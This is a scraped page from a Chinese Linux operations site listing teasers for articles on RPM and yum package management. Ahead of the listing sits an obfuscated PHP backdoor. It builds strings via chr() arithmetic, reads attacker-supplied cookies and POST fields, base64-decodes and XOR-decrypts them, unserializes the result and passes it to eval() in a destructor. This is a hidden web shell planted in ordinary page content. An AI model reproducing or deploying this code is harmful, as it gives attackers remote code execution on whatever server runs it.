$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} 包管理 | Linux运维部落

包管理

 • yum函数介绍以及自建yum仓库

  一、前言     在之前介绍了yum的配置(详细请移步 http://www.178linux.com/archives/6445)。但是有没有发现一个问题,虽然我们已将仓库指向一个可用的仓库服务器,但是随着Linux的不断升级和改版,我们是否还需要不断的去修改仓库的配置文件,如果只有一台还好,那如果我们有多…

  Linux干货 2015-07-24
 • 软件包管理器之二——YUM介绍及使用

  一、前言     之前我们介绍了RPM的应用(详细请查看http://www.178linux.com/archives/6383),发觉RPM安装软件有一个很繁琐的问题,那就是包与包之间的依赖关系,如果想正常安装和使用软件程序,就必须根据要求一步一步的解决软件之间的依赖关系。那么如果程序使用的包很多,将会很消耗使用人…

  Linux干货 2015-07-21
 • 软件包管理器之一——RPM介绍及应用

  一、前言:     在没有软件包管理器前,用户都是通过源代码的方式来安装软件。但是我们很容易发现,在每次安装软件时都必须对操作系统的境、编译的参数进行对应的编译,并且操作过程很是复杂,这对于不熟悉操作系统的朋友来说真心困难,那么有没有一款软件能让用户能很简单的安装所需的软件呢?    &n…

  Linux干货 2015-07-20
 • rpm包管理

  前言    RPM(简称RPM,全称为The RPM Package Manager)是在Linux下广泛使用的软件包管理器。RPM此名词可能是指.rpm的文件格式的软件包,也可能是指其本身的软件包管理器(RPM Package Manager)。最早由Red Hat研制,现在也由开源社区开发。RPM通常随附于Linux发行版,…

  Linux干货 2015-05-13
 • yum前端软件包管理器

  yum是什么     Yum (Yellow dog Updater, Modified) 由Duke University团队,修改Yellow Dog Linux的Yellow Dog Updater开发而成,是一个基于 RPM 包管理的字符前端软件包管理器。能够从指定的服务器自动下载…

  Linux干货 2015-05-13
 • linux rpm包管理

  一、概要     RPM:RPM Package Manager(rpm软件包管理器)的缩写。它能将编译好的程序打包一个文件或有限的几个文件,可用于实现安装、卸载、升级、查询等功能。 二、rpm软件包管理 rpm包的命名格式:name-version-relase.arch.rpm 例如:bash-1.1.0-5.el…

  Linux干货 2015-04-27